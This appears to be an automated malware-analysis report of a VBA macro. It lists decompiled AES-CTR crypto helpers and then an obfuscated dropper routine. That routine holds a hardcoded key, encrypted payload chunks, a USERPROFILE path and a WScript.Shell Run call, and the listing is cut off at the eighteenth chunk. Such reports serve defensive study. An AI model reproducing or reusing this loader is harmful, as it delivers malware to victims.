267	Dim baEmpty() as Byte
268	Dim baKey() as Byte
270	pvCryptoAesCtrTerminate m_uChunkedCtx	m_uChunkedCtx
271	baEmpty = vbNullString	vbNullString
272	If IsArray(key) Then	IsArray
273	baKey = key
274	Endif
275	If KeyLen <= 0 Then
276	KeyLen = AES_KEYLEN	AES_KEYLEN
277	Endif
278	AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)	m_uChunkedCtx
279	End Function

Function
pvCryptoAesCtrCryptAPIs: 30, Strings: 0, Number of lines: 59, Relevance: 37.559

APIs	Meta Information
pvArraySize
BCryptHashData
pvArrayPtr
AES_BLOCK_SIZE
AES_BLOCK_SIZE
UBound
AES_BLOCK_SIZE
CopyMemory
AES_BLOCK_SIZE
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
BCryptEncrypt
BCryptHashData
pvArrayPtr
LastError
Part of subcall function GetSystemMessage@Module3: Space$
Part of subcall function GetSystemMessage@Module3: FormatMessage
Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM
Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS
Part of subcall function GetSystemMessage@Module3: Len
Part of subcall function GetSystemMessage@Module3: Mid$
Part of subcall function GetSystemMessage@Module3: vbCrLf
Part of subcall function GetSystemMessage@Module3: Left$
Part of subcall function GetSystemMessage@Module3: Hex

Line	Instruction	Meta Information
395	Private Function pvCryptoAesCtrCrypt(uCtx as UcsCryptoContextType, baData() as Byte, optional ByVal Offset as Long, optional ByVal Size as Long = - 1, optional ByVal HashBefore as Boolean, optional ByVal HashAfter as Boolean) as Boolean
402	Dim lIdx as Long
403	Dim lJdx as Long
404	Dim lPadSize as Long
405	Dim hResult as Long
407	With uCtx
408	If Size < 0 Then
409	Size = pvArraySize(baData) - Offset	pvArraySize
410	Endif
411	If HashBefore Then
412	hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0)	BCryptHashData pvArrayPtr
413	If hResult < 0 Then
414	Goto QH
415	Endif
416	Endif
418	For lIdx = Offset To Offset + Size - 1
419	If (. EncrPos And (AES_BLOCK_SIZE - 1)) = 0 Then	AES_BLOCK_SIZE
420	Exit For
421	Endif
422	baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos)
423	. EncrPos = . EncrPos + 1
424	Next
425	If lIdx < Offset + Size Then
427	lPadSize = (Offset + Size - lIdx + AES_BLOCK_SIZE - 1) And - AES_BLOCK_SIZE	AES_BLOCK_SIZE
428	If UBound(. EncrData) + 1 < lPadSize Then	UBound
429	ReDim .EncrData(0 To lPadSize - 1) As Byte ' BAD !
430	Endif
432	For lJdx = 0 To lPadSize - 1 Step AES_BLOCK_SIZE	AES_BLOCK_SIZE
433	Call CopyMemory(. EncrData(lJdx), . Nonce(0), AES_BLOCK_SIZE)	CopyMemory AES_BLOCK_SIZE
434	If pvInc(. Nonce(3)) Then
435	If pvInc(. Nonce(2)) Then
436	If pvInc(. Nonce(1)) Then
437	If pvInc(. Nonce(0)) Then
439	Endif
440	Endif
441	Endif
442	Endif
443	Next	AES_BLOCK_SIZE
444	hResult = BCryptEncrypt(. hAesKey, . EncrData(0), lPadSize, 0, 0, 0, . EncrData(0), lPadSize, lJdx, 0)	BCryptEncrypt
445	If hResult < 0 Then
446	Goto QH
447	Endif
449	For . EncrPos = 0 To Offset + Size - lIdx - 1
450	baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos)
451	lIdx = lIdx + 1
452	Next
453	Endif
454	If HashAfter Then
455	hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0)	BCryptHashData pvArrayPtr
456	If hResult < 0 Then
457	Goto QH
458	Endif
459	Endif
460	End With
462	pvCryptoAesCtrCrypt = True
463	Exit Function
463	QH:
465	uCtx.LastError = GetSystemMessage(hResult)	LastError
466	End Function

Function
AesChunkedCryptArrayAPIs: 21, Strings: 0, Number of lines: 11, Relevance: 26.261

APIs	Meta Information
hAesAlg
LastError
ERR_CHUNKED_NOT_INIT
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

Line	Instruction	Meta Information
281	Public Function AesChunkedCryptArray(baInput() as Byte, baOutput() as Byte, optional ByVal Final as Boolean = True) as Boolean
282	If m_uChunkedCtx.hAesAlg = 0 Then	hAesAlg
283	m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT	LastError ERR_CHUNKED_NOT_INIT
284	Exit Function
285	Endif
286	baOutput = baInput
287	AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
288	If Final Then
289	pvCryptoAesCtrTerminate m_uChunkedCtx
290	Endif
291	End Function

Function
ToBase64ArrayAPIs: 10, Strings: 0, Number of lines: 10, Relevance: 12.51

APIs	Meta Information
UBound
String$
UBound
Len
CryptBinaryToString
VarPtr
UBound
CRYPT_STRING_BASE64
StrPtr
Left$

Line	Instruction	Meta Information
514	Public Function ToBase64Array(baData() as Byte) as String
515	Const CRYPT_STRING_BASE64 as Long = 1
516	Dim lSize as Long
518	If UBound(baData) >= 0 Then	UBound
519	ToBase64Array = String$(2 * UBound(baData) + 6, 0)	String$ UBound
520	lSize = Len(ToBase64Array) + 1	Len
521	Call CryptBinaryToString(VarPtr(baData(0)), UBound(baData) + 1, CRYPT_STRING_BASE64, StrPtr(ToBase64Array), lSize)	CryptBinaryToString VarPtr UBound CRYPT_STRING_BASE64 StrPtr
522	ToBase64Array = Left$(ToBase64Array, lSize)	Left$
523	Endif
524	End Function

Function
ToUtf8ArrayAPIs: 9, Strings: 0, Number of lines: 13, Relevance: 11.263

APIs	Meta Information
WideCharToMultiByte
CP_UTF8
StrPtr
Len
WideCharToMultiByte
CP_UTF8
StrPtr
Len
vbNullString

Line	Instruction	Meta Information
542	Public Function ToUtf8Array(sText as String) as Byte()
543	Const CP_UTF8 as Long = 65001
544	Dim baRetVal() as Byte
545	Dim lSize as Long
547	lSize = WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), ByVal 0, 0, 0, 0)	WideCharToMultiByte CP_UTF8 StrPtr Len
548	If lSize > 0 Then
549	Redim baRetVal(0 To lSize - 1)
550	Call WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), baRetVal(0), lSize, 0, 0)	WideCharToMultiByte CP_UTF8 StrPtr Len
551	Else
552	baRetVal = vbNullString	vbNullString
553	Endif
554	ToUtf8Array = baRetVal
555	End Function

Function
GetSystemMessageAPIs: 9, Strings: 0, Number of lines: 13, Relevance: 11.263

APIs	Meta Information
Space$
FormatMessage
FORMAT_MESSAGE_FROM_SYSTEM
FORMAT_MESSAGE_IGNORE_INSERTS
Len
Mid$
vbCrLf
Left$
Hex

Line	Instruction	Meta Information
568	Public Function GetSystemMessage(ByVal lLastDllError as Long) as String
569	Const FORMAT_MESSAGE_FROM_SYSTEM as Long = &H1000
570	Const FORMAT_MESSAGE_IGNORE_INSERTS as Long = &H200
571	Dim lSize as Long
573	GetSystemMessage = Space$(2000)	Space$
574	lSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM Or FORMAT_MESSAGE_IGNORE_INSERTS, 0, lLastDllError, 0, GetSystemMessage, Len(GetSystemMessage), 0)	FormatMessage FORMAT_MESSAGE_FROM_SYSTEM FORMAT_MESSAGE_IGNORE_INSERTS Len
575	If lSize > 2 Then
576	If Mid$(GetSystemMessage, lSize - 1, 2) = vbCrLf Then	Mid$ vbCrLf
577	lSize = lSize - 2
578	Endif
579	Endif
580	GetSystemMessage = Left$(GetSystemMessage, lSize) & " &H" & Hex(lLastDllError)	Left$ Hex
581	End Function

Function
FromUtf8ArrayAPIs: 9, Strings: 0, Number of lines: 9, Relevance: 11.259

APIs	Meta Information
UBound
String$
UBound
MultiByteToWideChar
CP_UTF8
UBound
StrPtr
Len
Left$

Line	Instruction	Meta Information
557	Public Function FromUtf8Array(baText() as Byte) as String
558	Const CP_UTF8 as Long = 65001
559	Dim lSize as Long
561	If UBound(baText) >= 0 Then	UBound
562	FromUtf8Array = String$(2 * (UBound(baText) + 1), 0)	String$ UBound
563	lSize = MultiByteToWideChar(CP_UTF8, 0, baText(0), UBound(baText) + 1, StrPtr(FromUtf8Array), Len(FromUtf8Array))	MultiByteToWideChar CP_UTF8 UBound StrPtr Len
564	FromUtf8Array = Left$(FromUtf8Array, lSize)	Left$
565	Endif
566	End Function

Function
FromBase64ArrayAPIs: 7, Strings: 0, Number of lines: 14, Relevance: 8.764

APIs	Meta Information
Len
CryptStringToBinary
StrPtr
Len
CRYPT_STRING_BASE64
VarPtr
vbNullString

Line	Instruction	Meta Information
526	Public Function FromBase64Array(sText as String) as Byte()
527	Const CRYPT_STRING_BASE64 as Long = 1
528	Dim lSize as Long
529	Dim baOutput() as Byte
531	lSize = Len(sText) + 1	Len
532	Redim baOutput(0 To lSize - 1)
533	Call CryptStringToBinary(StrPtr(sText), Len(sText), CRYPT_STRING_BASE64, VarPtr(baOutput(0)), lSize, 0, 0)	CryptStringToBinary StrPtr Len CRYPT_STRING_BASE64 VarPtr
534	If lSize > 0 Then
535	Redim Preserve baOutput(0 To lSize - 1)
536	FromBase64Array = baOutput
537	Else
538	FromBase64Array = vbNullString	vbNullString
539	Endif
540	End Function

Property
Get pvArrayPtrAPIs: 7, Strings: 0, Number of lines: 9, Relevance: 8.759

APIs	Meta Information
CopyMemory
ArrPtr
PTR_SIZE
UBound
LBound
VarPtr
LBound

Line	Instruction	Meta Information
489	Private Property Get pvArrayPtr(baArray() as Byte, optional ByVal Index as Long) as LongPtr
490	Dim lPtr as LongPtr
493	Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE)	CopyMemory ArrPtr PTR_SIZE
494	If lPtr <> 0 Then
495	If 0 <= Index And Index <= UBound(baArray) - LBound(baArray) Then	UBound LBound
496	pvArrayPtr = VarPtr(baArray(LBound(baArray) + Index))	VarPtr LBound
497	Endif
498	Endif
499	End Property

Subroutine
pvCryptoAesCtrTerminateAPIs: 5, Strings: 0, Number of lines: 24, Relevance: 6.274

APIs	Meta Information
BCryptCloseAlgorithmProvider
BCryptDestroyHash
BCryptCloseAlgorithmProvider
BCryptDestroyKey
BCryptCloseAlgorithmProvider

Line	Instruction	Meta Information
370	Private Sub pvCryptoAesCtrTerminate(uCtx as UcsCryptoContextType)
371	With uCtx
372	If . hPbkdf2Alg <> 0 Then
373	Call BCryptCloseAlgorithmProvider(. hPbkdf2Alg, 0)	BCryptCloseAlgorithmProvider
374	. hPbkdf2Alg = 0
375	Endif
376	If . hHmacHash <> 0 Then
377	Call BCryptDestroyHash(. hHmacHash)	BCryptDestroyHash
378	. hHmacHash = 0
379	Endif
380	If . hHmacAlg <> 0 Then
381	Call BCryptCloseAlgorithmProvider(. hHmacAlg, 0)	BCryptCloseAlgorithmProvider
382	. hHmacAlg = 0
383	Endif
384	If . hAesKey <> 0 Then
385	Call BCryptDestroyKey(. hAesKey)	BCryptDestroyKey
386	. hAesKey = 0
387	Endif
388	If . hAesAlg <> 0 Then
389	Call BCryptCloseAlgorithmProvider(. hAesAlg, 0)	BCryptCloseAlgorithmProvider
390	. hAesAlg = 0
391	Endif
392	End With
393	End Sub

Property
Get pvArraySizeAPIs: 5, Strings: 0, Number of lines: 7, Relevance: 6.257

APIs	Meta Information
CopyMemory
ArrPtr
PTR_SIZE
UBound
LBound

Line	Instruction	Meta Information
501	Private Property Get pvArraySize(baArray() as Byte) as Long
502	Dim lPtr as LongPtr
505	Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE)	CopyMemory ArrPtr PTR_SIZE
506	If lPtr <> 0 Then
507	pvArraySize = UBound(baArray) + 1 - LBound(baArray)	UBound LBound
508	Endif
509	End Property

Function
pvCryptoGetFinalHashAPIs: 4, Strings: 0, Number of lines: 7, Relevance: 5.007

APIs	Meta Information
HashLen
BCryptFinishHash
hHmacHash
HashLen

Line	Instruction	Meta Information
468	Private Function pvCryptoGetFinalHash(uCtx as UcsCryptoContextType, ByVal lSize as Long) as Byte()
469	Dim baResult() as Byte
471	Redim baResult(0 To uCtx.HashLen - 1)	HashLen
472	Call BCryptFinishHash(uCtx.hHmacHash, baResult(0), uCtx.HashLen, 0)	BCryptFinishHash hHmacHash HashLen
473	Redim Preserve baResult(0 To lSize - 1)
474	pvCryptoGetFinalHash = baResult
475	End Function

Function
pvIncAPIs: 2, Strings: 0, Number of lines: 10, Relevance: 2.51

APIs	Meta Information
htonl
htonl

Line	Instruction	Meta Information
477	Private Function pvInc(lValue as Long) as Boolean
478	lValue = htonl(lValue)	htonl
479	If lValue = - 1 Then
480	lValue = 0
482	pvInc = True
483	Else
484	lValue = (lValue Xor &H80000000) + 1 Xor &H80000000
485	lValue = htonl(lValue)	htonl
486	Endif
487	End Function

Function
AesChunkedGetLastErrorAPIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
LastError
m_uChunkedCtx

Line	Instruction	Meta Information
293	Public Function AesChunkedGetLastError() as String
294	AesChunkedGetLastError = m_uChunkedCtx.LastError	LastError m_uChunkedCtx
295	End Function

Function
PeekPtrAPIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
CopyMemory
PTR_SIZE

Line	Instruction	Meta Information
583	Private Function PeekPtr(ByVal lPtr as LongPtr) as LongPtr
584	Call CopyMemory(PeekPtr, ByVal lPtr, PTR_SIZE)	CopyMemory PTR_SIZE
585	End Function

Module: ViewSession

Declaration

Line	Content
1	Attribute VB_Name = "ViewSession"
2	Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = False
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Non-Executed Functions

Subroutine
ikwiwiejs_19293_AdeAPIs: 34, Strings: 28, Number of lines: 49, Relevance: 110.299

APIs	Meta Information
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN
Part of subcall function AesDecryptString@Module3: KDF_SALTLEN
Part of subcall function AesDecryptString@Module3: vbNullString
Part of subcall function AesDecryptString@Module3: vbNullString
Part of subcall function AesDecryptString@Module3: IsArray
Part of subcall function AesDecryptString@Module3: IsMissing
Part of subcall function AesDecryptString@Module3: vbNullString
Part of subcall function AesDecryptString@Module3: UBound
Part of subcall function AesDecryptString@Module3: PREFIXLEN
Part of subcall function AesDecryptString@Module3: String$
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN
Part of subcall function AesDecryptString@Module3: CopyMemory
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGIC
Part of subcall function AesDecryptString@Module3: KDF_SALTLEN
Part of subcall function AesDecryptString@Module3: CopyMemory
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN
Part of subcall function AesDecryptString@Module3: KDF_SALTLEN
Part of subcall function AesDecryptString@Module3: UBound
Part of subcall function AesDecryptString@Module3: PREFIXLEN
Part of subcall function AesDecryptString@Module3: CopyMemory
Part of subcall function AesDecryptString@Module3: PREFIXLEN
Part of subcall function AesDecryptString@Module3: UBound
Part of subcall function AesDecryptString@Module3: UBound
Part of subcall function AesDecryptString@Module3: PREFIXLEN
Part of subcall function AesDecryptString@Module3: vbNullString
Part of subcall function AesDecryptString@Module3: Raise
Part of subcall function AesDecryptString@Module3: vbObjectError
Environ
Open
Len
Mid
CreateObject
Run

Strings	Decrypted Strings
"Bnshekao@3123989942"
"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"
"USERPROFILE"
"WScript.Shell"
""""

Line	Instruction	Meta Information
10	Public Sub ikwiwiejs_19293_Ade()
11	Dim key as String
12	Dim decryptedText as String
13	Dim i as Integer
14	Dim parts(1 To 60) as String
15	Dim Oekksoioa_ as String
16	Dim chunkSize as Integer
17	Dim tempFilePath as String
20	key = "Bnshekao@3123989942"
21	part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
22	part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
23	part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
24	part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
25	part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
26	part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
27	part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
28	part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
29	part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
30	part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
31	part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
32	part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
33	part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
34	part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
35	part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
36	part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
37	part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
38	part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
